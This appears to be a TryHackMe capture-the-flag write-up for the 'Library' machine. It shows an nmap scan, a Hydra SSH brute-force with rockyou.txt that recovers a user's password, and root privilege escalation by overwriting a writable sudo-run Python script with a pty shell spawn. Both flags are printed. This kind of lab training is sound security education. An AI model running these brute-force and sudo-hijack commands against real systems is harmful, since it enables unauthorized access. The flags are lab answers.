Library TryHackMe Writeup

Overview

This challange is a boot2root machine for FIT and bsides guatemala CTF

Initial Reconnaissance

Started by performing a basic port scan to identify open services:

nmap -sC -sV -A 10.10.10.10

Discovered the following open ports:

22/tcp - SSH
80/tcp - HTTP Apache/2.4.18 (Ubuntu) (http-robots.txt with 1 disallowed entry)

Remember to check robots.txt on the website!

Web Application Analysis

Identified a website running on port 80 and an open SSH port.

Found a user named meliodas associated with articles on the website.

Note: User: meliodas

Visited robots.txt:

User-agent: rockyou

This provided a hint to use the rockyou.txt wordlist for brute-forcing.

Exploitation

SSH Brute-Force with Hydra

Used Hydra to brute-force the password for the user meliodas:

hydra -l meliodas -P rockyou.txt 10.10.10.10 ssh -t 5

Successfully obtained credentials:

Username: meliodas

Password: iloveyou1

Logged in via SSH:

ssh meliodas@10.10.10.10

Verified access:

whoami

id

ls -la

We can see bak.py and user.txt

Flag Capture: user.txt

Located and read the user flag:

cat user.txt

User Flag:

6d488cbb3f111d135722c33cb635f4ec

Flag Capture: root.txt

Checked for sudo privileges:

sudo -l

Found that the user can run /usr/bin/python /home/meliodas/bak.py as root without a password, indicating a potential privilege escalation vector.

Inspected the bak.py file:

cat bak.py

ls -l bak.py

Confirmed that bak.py is writable by the meliodas user and executable as root, a misconfiguration exploitable via techniques listed on GTFOBins.

Replaced bak.py with a malicious script to spawn a root shell, leveraging Python's ability to execute arbitrary commands (as noted in GTFOBins):

rm bak.py

touch bak.py

nano bak.py

Added the following code to spawn an interactive root shell:

import pty; pty.spawn("/bin/bash")

Executed the script with sudo, exploiting the misconfigured sudo rule:

sudo /usr/bin/python /home/meliodas/bak.py

Obtained a root shell and verified:

whoami

Navigated to the root directory and read the root flag:

cd /root

ls -la

cat root.txt

Root Flag:

e8c8c6c256c35515d1d344ee0488c617

Lessons Learned

Always check robots.txt for potential hints or disallowed entries.

Brute-forcing credentials with common wordlists like rockyou.txt can be effective for weak passwords.

Privilege escalation can be achieved by exploiting writable files executed with elevated permissions.

Regularly audit sudo permissions to prevent unauthorized access to sensitive scripts.

Tools Used

Nmap - Port scanning and service enumeration
Hydra - Password brute-forcing for SSH
SSH - Remote access to the target machine
Nano - Editing files on the target system

Library Writeup